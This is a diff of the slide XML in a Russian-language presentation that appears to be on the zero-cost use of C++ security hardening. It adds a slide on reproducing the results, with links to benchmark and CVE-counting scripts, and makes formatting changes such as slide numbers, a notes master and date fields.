+</p:sld>
+</file>
+
+<file path=ppt/slides/slide90.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC7532A-964A-431E-A4F5-80DD903BB997}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Воспроизведение результатов</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C484971-452F-45F6-AD84-582487E77763}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Версии дистрибутивов</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Проверялись последние стабильные версии</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Debian 12 (bookworm), Fedora 42, Ubuntu 24.04</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Замеры производительности </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/bench</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Подсчёт</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> CVE/KEV</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>-метрик</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/tree/main/CppZeroCost/2025/scripts</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пруфлинки и дополнительная информация доступны в файле</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>https://github.com/yugr/slides/blob/main/CppZeroCost/2025/plan.md</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4165890631"/>
       </p:ext>
     </p:extLst>
   </p:cSld>

--- a/CppZeroCost/2025/RU.pptx
+++ b/CppZeroCost/2025/RU.pptx
@@ -4,6 +4,9 @@
   <p:sldMasterIdLst>
     <p:sldMasterId id="2147483648" r:id="rId1"/>
   </p:sldMasterIdLst>
+  <p:notesMasterIdLst>
+    <p:notesMasterId r:id="rId92"/>
+  </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="280" r:id="rId2"/>
     <p:sldId id="257" r:id="rId3"/>
@@ -21,8 +24,8 @@
     <p:sldId id="262" r:id="rId15"/>
     <p:sldId id="266" r:id="rId16"/>
     <p:sldId id="267" r:id="rId17"/>
-    <p:sldId id="333" r:id="rId18"/>
-    <p:sldId id="268" r:id="rId19"/>
+    <p:sldId id="348" r:id="rId18"/>
+    <p:sldId id="333" r:id="rId19"/>
     <p:sldId id="282" r:id="rId20"/>
     <p:sldId id="269" r:id="rId21"/>
     <p:sldId id="273" r:id="rId22"/>
@@ -201,6 +204,355 @@
 </p:presentation>
 </file>
 
+<file path=ppt/notesMasters/notesMaster1.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notesMaster xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:bg>
+      <p:bgRef idx="1001">
+        <a:schemeClr val="bg1"/>
+      </p:bgRef>
+    </p:bg>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Header Placeholder 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="hdr" sz="quarter"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="0"/>
+            <a:ext cx="2971800" cy="458788"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
+          <a:lstStyle>
+            <a:lvl1pPr algn="l">
+              <a:defRPr sz="1200"/>
+            </a:lvl1pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Date Placeholder 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="dt" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3884613" y="0"/>
+            <a:ext cx="2971800" cy="458788"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
+          <a:lstStyle>
+            <a:lvl1pPr algn="r">
+              <a:defRPr sz="1200"/>
+            </a:lvl1pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:fld id="{A8F27B54-EFD4-4F1F-9CE4-9A3C368187A4}" type="datetimeFigureOut">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>7/19/2025</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="1143000"/>
+            <a:ext cx="5486400" cy="3086100"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln w="12700">
+            <a:solidFill>
+              <a:prstClr val="black"/>
+            </a:solidFill>
+          </a:ln>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Notes Placeholder 4"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" sz="quarter" idx="3"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4400550"/>
+            <a:ext cx="5486400" cy="3600450"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0"/>
+            <a:r>
+              <a:rPr lang="en-US"/>
+              <a:t>Click to edit Master text styles</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US"/>
+              <a:t>Second level</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US"/>
+              <a:t>Third level</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="3"/>
+            <a:r>
+              <a:rPr lang="en-US"/>
+              <a:t>Fourth level</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="4"/>
+            <a:r>
+              <a:rPr lang="en-US"/>
+              <a:t>Fifth level</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="Footer Placeholder 5"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="ftr" sz="quarter" idx="4"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="0" y="8685213"/>
+            <a:ext cx="2971800" cy="458787"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
+          <a:lstStyle>
+            <a:lvl1pPr algn="l">
+              <a:defRPr sz="1200"/>
+            </a:lvl1pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="5"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3884613" y="8685213"/>
+            <a:ext cx="2971800" cy="458787"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
+          <a:lstStyle>
+            <a:lvl1pPr algn="r">
+              <a:defRPr sz="1200"/>
+            </a:lvl1pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:fld id="{CBBD9083-F18D-4765-A928-A3C7AF570582}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>‹#›</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2743195553"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
+  <p:notesStyle>
+    <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+      <a:defRPr sz="1200" kern="1200">
+        <a:solidFill>
+          <a:schemeClr val="tx1"/>
+        </a:solidFill>
+        <a:latin typeface="+mn-lt"/>
+        <a:ea typeface="+mn-ea"/>
+        <a:cs typeface="+mn-cs"/>
+      </a:defRPr>
+    </a:lvl1pPr>
+    <a:lvl2pPr marL="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+      <a:defRPr sz="1200" kern="1200">
+        <a:solidFill>
+          <a:schemeClr val="tx1"/>
+        </a:solidFill>
+        <a:latin typeface="+mn-lt"/>
+        <a:ea typeface="+mn-ea"/>
+        <a:cs typeface="+mn-cs"/>
+      </a:defRPr>
+    </a:lvl2pPr>
+    <a:lvl3pPr marL="914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+      <a:defRPr sz="1200" kern="1200">
+        <a:solidFill>
+          <a:schemeClr val="tx1"/>
+        </a:solidFill>
+        <a:latin typeface="+mn-lt"/>
+        <a:ea typeface="+mn-ea"/>
+        <a:cs typeface="+mn-cs"/>
+      </a:defRPr>
+    </a:lvl3pPr>
+    <a:lvl4pPr marL="1371600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+      <a:defRPr sz="1200" kern="1200">
+        <a:solidFill>
+          <a:schemeClr val="tx1"/>
+        </a:solidFill>
+        <a:latin typeface="+mn-lt"/>
+        <a:ea typeface="+mn-ea"/>
+        <a:cs typeface="+mn-cs"/>
+      </a:defRPr>
+    </a:lvl4pPr>
+    <a:lvl5pPr marL="1828800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+      <a:defRPr sz="1200" kern="1200">
+        <a:solidFill>
+          <a:schemeClr val="tx1"/>
+        </a:solidFill>
+        <a:latin typeface="+mn-lt"/>
+        <a:ea typeface="+mn-ea"/>
+        <a:cs typeface="+mn-cs"/>
+      </a:defRPr>
+    </a:lvl5pPr>
+    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+      <a:defRPr sz="1200" kern="1200">
+        <a:solidFill>
+          <a:schemeClr val="tx1"/>
+        </a:solidFill>
+        <a:latin typeface="+mn-lt"/>
+        <a:ea typeface="+mn-ea"/>
+        <a:cs typeface="+mn-cs"/>
+      </a:defRPr>
+    </a:lvl6pPr>
+    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+      <a:defRPr sz="1200" kern="1200">
+        <a:solidFill>
+          <a:schemeClr val="tx1"/>
+        </a:solidFill>
+        <a:latin typeface="+mn-lt"/>
+        <a:ea typeface="+mn-ea"/>
+        <a:cs typeface="+mn-cs"/>
+      </a:defRPr>
+    </a:lvl7pPr>
+    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+      <a:defRPr sz="1200" kern="1200">
+        <a:solidFill>
+          <a:schemeClr val="tx1"/>
+        </a:solidFill>
+        <a:latin typeface="+mn-lt"/>
+        <a:ea typeface="+mn-ea"/>
+        <a:cs typeface="+mn-cs"/>
+      </a:defRPr>
+    </a:lvl8pPr>
+    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+      <a:defRPr sz="1200" kern="1200">
+        <a:solidFill>
+          <a:schemeClr val="tx1"/>
+        </a:solidFill>
+        <a:latin typeface="+mn-lt"/>
+        <a:ea typeface="+mn-ea"/>
+        <a:cs typeface="+mn-cs"/>
+      </a:defRPr>
+    </a:lvl9pPr>
+  </p:notesStyle>
+</p:notesMaster>
+</file>
+
 <file path=ppt/slideLayouts/slideLayout1.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="title" preserve="1">
   <p:cSld name="Title Slide">
@@ -346,7 +698,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
+            <a:fld id="{4E570717-CC08-42AC-84F3-7EB74EE2C2EE}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:t>7/19/2025</a:t>
             </a:fld>
@@ -544,7 +896,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
+            <a:fld id="{E850434B-ABC0-4013-A159-517880C2CE4B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:t>7/19/2025</a:t>
             </a:fld>
@@ -752,7 +1104,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
+            <a:fld id="{307E2251-42B8-4CD0-9F76-CE8A218C5A9B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:t>7/19/2025</a:t>
             </a:fld>
@@ -950,7 +1302,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
+            <a:fld id="{650366BD-2959-43A5-9C43-B178997CA9C1}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:t>7/19/2025</a:t>
             </a:fld>
@@ -1225,7 +1577,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
+            <a:fld id="{44A443A2-278A-4AA2-A6FA-B813D9AB289B}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:t>7/19/2025</a:t>
             </a:fld>
@@ -1490,7 +1842,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
+            <a:fld id="{8DB96CD0-8DC9-4D9E-8F97-A64EB549E498}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:t>7/19/2025</a:t>
             </a:fld>
@@ -1902,7 +2254,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
+            <a:fld id="{8728ABDD-F7C0-49E5-BDEF-78EEAB9D4FF0}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:t>7/19/2025</a:t>
             </a:fld>
@@ -2043,7 +2395,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
+            <a:fld id="{1815E602-B233-4072-AF5E-EEC16D6A3250}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:t>7/19/2025</a:t>
             </a:fld>
@@ -2156,7 +2508,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
+            <a:fld id="{B46368E2-0F8E-43F1-B205-4CE4ED81C818}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:t>7/19/2025</a:t>
             </a:fld>
@@ -2467,7 +2819,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
+            <a:fld id="{A90826D4-3247-4C35-B745-95D9A6527E86}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:t>7/19/2025</a:t>
             </a:fld>
@@ -2755,7 +3107,7 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
+            <a:fld id="{F697CA6C-CB8E-4E4E-A40B-CF748107F47F}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:t>7/19/2025</a:t>
             </a:fld>
@@ -2996,7 +3348,7 @@
             </a:lvl1pPr>
           </a:lstStyle>
           <a:p>
-            <a:fld id="{8B51C82C-088A-4FB4-80D3-9F271402ACE7}" type="datetimeFigureOut">
+            <a:fld id="{486D2D92-9836-4BF5-99A8-6BBA488E0F07}" type="datetime1">
               <a:rPr lang="en-US" smtClean="0"/>
               <a:t>7/19/2025</a:t>
             </a:fld>
@@ -3115,6 +3467,7 @@
     <p:sldLayoutId id="2147483658" r:id="rId10"/>
     <p:sldLayoutId id="2147483659" r:id="rId11"/>
   </p:sldLayoutIdLst>
+  <p:hf hdr="0" ftr="0" dt="0"/>
   <p:txStyles>
     <p:titleStyle>
       <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
@@ -3468,6 +3821,35 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45913A41-D244-4E9C-A63B-26AA0EB953A4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>1</a:t>
+            </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
@@ -3556,6 +3938,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{206757F0-77DF-4110-987B-1E95EAECEC86}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>10</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -3740,6 +4151,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8680649-56E5-4F4C-A817-23714E9201AF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>11</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -3855,7 +4295,7 @@
               <a:t>Не загруженные динамически с помощью </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:rPr lang="en-US" dirty="0"/>
               <a:t>dlopen</a:t>
             </a:r>
             <a:r>
@@ -3891,21 +4331,7 @@
                 <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                 <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
               </a:rPr>
-              <a:t>LDFLAGS += -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>Wl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>,--fatal-warnings</a:t>
+              <a:t>LDFLAGS += -Wl,--fatal-warnings</a:t>
             </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0">
               <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
@@ -3919,12 +4345,8 @@
               <a:t>Основные причины </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>execstack</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>execstack </a:t>
             </a:r>
             <a:r>
